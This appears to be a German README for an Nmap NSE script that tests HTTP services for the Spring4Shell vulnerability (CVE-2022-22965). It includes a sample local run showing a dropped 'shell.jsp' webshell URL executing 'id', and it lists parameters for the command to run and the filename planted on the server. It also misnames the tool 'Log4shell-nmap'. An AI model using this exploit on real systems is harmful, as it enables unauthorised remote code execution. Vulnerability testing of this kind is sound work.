
Nmap Spring4Shell NSE-Skript für Spring Boot RCE (CVE-2022-22965)
Log4shell-nmap ist ein NSE-Skript zur Erkennung von Spring4Shell RCE-Schwachstellen (CVE-2022-22965) in HTTP-Diensten. Das Skript injiziert die korrekte Payload in die Anwendung und führt anschließend den angegebenen Befehl auf dem festgelegten Endpunkt aus.
Siehe hier.
┌──(kali㉿kali)-[~/nmap-spring4shell]
└─$ nmap 127.0.0.1 --script=./spring4shell.nse
(...)
PORT STATE SERVICE REASON VERSION
8080/tcp open http-proxy syn-ack
| spring4shell:
| VULNERABLE:
| Spring4Shell - Spring Framework RCE via Data Binding on JDK 9+
| State: VULNERABLE
| IDs: CVE:CVE-2022-22965
| Check results:
| 127.0.0.1:8080/shell.jsp?pwd=j&cmd=id
| Extra information:
| TESTED URL: 127.0.0.1:8080
| COMMAND: id
| ASSERTION: uid
| References:
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965
Wir können mehrere Variablen im Skript verwenden. Diese sind wie folgt:
endpoint – relative URL. Auf https://bugspace.pl/search/videos wäre dies /search/videos,command – Befehl, der auf dem Server ausgeführt werden soll. Der Standardbefehl ist id,assertion – die überprüfte Zeichenfolge in der Serverantwort. Der Standard-assertion-Wert ist uid,filename – Dateiname auf dem Server. Weitere Informationen finden Sie hier. Der Standardname ist shell.Getestet an Anwendungen von hier und hier
Gleich wie Nmap. Siehe https://nmap.org/book/man-legal.html